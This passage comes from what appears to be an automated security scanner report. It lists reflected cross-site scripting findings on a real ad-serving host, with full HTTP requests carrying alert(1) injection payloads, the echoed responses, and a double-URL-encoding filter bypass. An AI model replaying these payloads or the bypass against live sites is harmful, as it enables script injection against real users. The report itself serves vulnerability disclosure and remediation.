HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:14 GMT; path=/
Set-Cookie: i_1=33:353:811:3:0:38345:1296399014:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894bdf10'-alert(1)-'1127fd83b50&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.120. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d94a'-alert(1)-'4c886f70b75 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:32 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296399032:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:32 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef261'-alert(1)-'59d2a35347c was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296399023:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6bc'-alert(1)-'9bf2b8ea5fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:00 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296399000:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

5.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0675'-alert(1)-'1d0a1b63990 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:41 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38345:1296398981:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8f8c'-alert(1)-'f1bcb22b6f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:13 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:38345:1296399073:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:51:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec90"-alert(1)-"90ddf5ba23f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639dec90"-alert(1)-"90ddf5ba23f&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351609**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639dec90"-alert(1)-"90ddf5ba23f&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf2d"-alert(1)-"7ab97a50287 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061259cf2d"-alert(1)-"7ab97a50287&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1296351649**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061259cf2d"-alert(1)-"7ab97a50287&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b596a"-alert(1)-"06aa7f69f1c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8b596a"-alert(1)-"06aa7f69f1c HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8b596a"-alert(1)-"06aa7f69f1c">
...[SNIP]...

5.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e350c"-alert(1)-"866fa489770 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQe350c"-alert(1)-"866fa489770&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1296351662**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQe350c"-alert(1)-"866fa489770&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2726b%2522%253balert%25281%2529%252f%252fe9adb046056 was submitted in the REST URL parameter 2. This input was echoed as 2726b";alert(1)//e9adb046056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313572726b%2522%253balert%25281%2529%252f%252fe9adb046056/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313572726b";alert(1)//e9adb046056/353.0.js.120x30/1296351787**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=093
...[SNIP]...

5.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c2a%2522%253balert%25281%2529%252f%252f53353438aff was submitted in the REST URL parameter 3. This input was echoed as 34c2a";alert(1)//53353438aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

